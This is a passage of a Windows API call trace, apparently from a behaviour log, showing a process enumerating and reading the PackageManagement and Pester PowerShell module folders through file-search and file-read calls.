Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0227.721] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8cfc0 | out: lpFindFileData=0x653ef8cfc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd0d50 [0227.721] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.721] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0227.721] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0227.722] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0227.722] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0227.722] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0227.723] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0227.723] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0227.723] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0227.723] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0227.724] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0227.724] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0227.724] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0227.724] FindClose (in: hFindFile=0x25b73cd0d50 | out: hFindFile=0x25b73cd0d50) returned 1 [0227.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d1e0) returned 1 [0227.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d1a0) returned 1 [0227.725] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0227.725] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0227.725] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0227.725] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0227.725] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0227.725] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0227.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.725] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d4d0 | out: lpFileInformation=0x653ef8d4d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0227.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.726] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0227.726] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1bf0 [0227.726] FindNextFileW (in: hFindFile=0x25b73cd1bf0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.726] FindNextFileW (in: hFindFile=0x25b73cd1bf0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0227.726] FindNextFileW (in: hFindFile=0x25b73cd1bf0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.727] FindClose (in: hFindFile=0x25b73cd1bf0 | out: hFindFile=0x25b73cd1bf0) returned 1 [0227.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.727] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d010, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0227.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d460) returned 1 [0227.727] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d540 | out: lpFileInformation=0x653ef8d540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0227.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0227.729] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0227.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d200) returned 1 [0227.729] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x804 [0227.730] GetFileType (hFile=0x804) returned 0x1 [0227.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d170) returned 1 [0227.730] GetFileType (hFile=0x804) returned 0x1 [0227.730] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c1ae4b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1ae4b0*, lpNumberOfBytesRead=0x653ef8d2d8*=0x5f8, lpOverlapped=0x0) returned 1 [0227.730] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c1ad9e8, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1ad9e8*, lpNumberOfBytesRead=0x653ef8d2d8*=0x0, lpOverlapped=0x0) returned 1 [0227.730] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c1ae4b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1ae4b0*, lpNumberOfBytesRead=0x653ef8d2d8*=0x0, lpOverlapped=0x0) returned 1 [0227.730] CloseHandle (hObject=0x804) returned 1 [0227.732] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0227.732] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0227.732] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0227.732] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0227.732] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0227.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0227.733] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1410 [0227.733] FindNextFileW (in: hFindFile=0x25b73cd1410, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.733] FindNextFileW (in: hFindFile=0x25b73cd1410, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0227.733] FindNextFileW (in: hFindFile=0x25b73cd1410, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.733] FindClose (in: hFindFile=0x25b73cd1410 | out: hFindFile=0x25b73cd1410) returned 1 [0227.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.734] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0227.734] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd15f0 [0227.734] FindNextFileW (in: hFindFile=0x25b73cd15f0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.734] FindNextFileW (in: hFindFile=0x25b73cd15f0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0227.735] FindNextFileW (in: hFindFile=0x25b73cd15f0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0227.735] FindClose (in: hFindFile=0x25b73cd15f0 | out: hFindFile=0x25b73cd15f0) returned 1 [0227.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d250) returned 1 [0227.735] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0227.735] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8cf60 | out: lpFindFileData=0x653ef8cf60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1cb0 [0227.736] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.736] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, 